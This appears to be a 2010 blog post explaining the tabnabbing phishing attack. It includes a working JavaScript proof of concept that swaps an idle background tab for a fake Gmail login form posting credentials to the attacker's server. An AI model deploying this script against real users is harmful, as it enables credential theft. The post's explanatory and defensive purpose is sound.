Tuesday, May 25th, 2010

Aza Raskin identifies yet another form of phishing attack. Tabnabbing is the process of replacing the entire contents of a page while it is sitting in a background tab. Want to see it in action? Just visit Aza’s article, switch to another tab for 5 seconds and see what happens. A nice clean demo, and as scary as it is simple.
The steps in detail:
- A user navigates to your normal looking site.
- You detect when the page has lost focus and hasn’t been interacted with for a while.
- You then replace the favicon, the title and the page contents with a look-alike of the Gmail login page. The address bar still shows your site’s URL, but nothing else about the tab does.
- As the user scans their many open tabs, the favicon and title act as a strong visual cue. Memory is malleable, and the user will most likely assume they left a Gmail tab open. When they click back to the fake Gmail tab, they see what looks like the standard Gmail login page, assume they have been logged out, and enter their credentials. The attack preys on the perceived immutability of tabs.
- After the user has entered their login information and you have sent it to your server, you redirect them to the real Gmail. Because they were never logged out in the first place, it looks as if the login succeeded.
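The detect-then-swap part of the steps above, as an added example that is not Aza’s demo code: the idle-tracking decision is kept in a small pure object so it can be exercised outside a browser, and the DOM swap it drives is only wired up when a `window` exists. The 5 second threshold, the favicon URL and the look-alike markup are placeholders.

```javascript
// Added example (not code from Aza Raskin's article): a minimal tabnabbing
// proof of concept split into (1) a pure focus/idle state machine and
// (2) the DOM swap it triggers. Only the state machine runs under Node.

const IDLE_MS = 5000; // assumed threshold: swap after 5 s without focus or input

// (1) Pure state: is the tab focused, when was the last interaction,
// and has the swap already happened? No DOM access here.
function createNabber(idleMs = IDLE_MS) {
  const state = { focused: true, lastActivity: 0, swapped: false };
  return {
    onFocus(now) { state.focused = true; state.lastActivity = now; },
    onBlur(now) { state.focused = false; state.lastActivity = now; },
    onActivity(now) { state.lastActivity = now; },
    // Swap at most once, only while the tab is not focused, and only
    // after idleMs of silence since the last focus change or input.
    shouldSwap(now) {
      return !state.swapped && !state.focused &&
        now - state.lastActivity >= idleMs;
    },
    markSwapped() { state.swapped = true; },
    isSwapped() { return state.swapped; },
  };
}

// (2) What the swap changes: title, favicon and body. What it cannot
// change is the address bar, which is the one cue a user can still trust.
function buildLookalike() {
  return {
    title: 'Gmail: Email from Google',
    favicon: 'https://attacker.example/gmail-favicon.ico', // placeholder URL
    html: '<h1>Sign in to Gmail</h1><form method="post" action="/collect">' +
          '<input name="user"><input name="pass" type="password">' +
          '<button>Sign in</button></form>', // placeholder markup
  };
}

function applyLookalike(doc, fake) {
  doc.title = fake.title;
  let link = doc.querySelector('link[rel~="icon"]');
  if (!link) {
    link = doc.createElement('link');
    link.rel = 'icon';
    doc.head.appendChild(link);
  }
  link.href = fake.favicon;
  doc.body.innerHTML = fake.html;
}

// Browser wiring; skipped when the file is loaded under Node.
if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  const nab = createNabber();
  window.addEventListener('blur', () => nab.onBlur(Date.now()));
  window.addEventListener('focus', () => nab.onFocus(Date.now()));
  for (const ev of ['mousemove', 'keydown', 'scroll']) {
    document.addEventListener(ev, () => nab.onActivity(Date.now()));
  }
  const timer = setInterval(() => {
    if (nab.shouldSwap(Date.now())) {
      applyLookalike(document, buildLookalike());
      nab.markSwapped();
      clearInterval(timer);
    }
  }, 500);
}
```

The swap fires only after the tab has been both unfocused and untouched for the threshold, which is why the demo feels natural: the user has genuinely moved on. Nothing in the swap touches `location`, so the URL bar keeps showing the original site, and checking it before typing a password is the practical defence.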
Aza also notes the attack could get a lot more potent if the attacker (a) used the CSS :visited history leak to discover which sites the user has visited, and (b) employed other techniques, such as timing attacks, to determine which services the user is currently logged into, so that the look-alike page targets a service the user actually uses.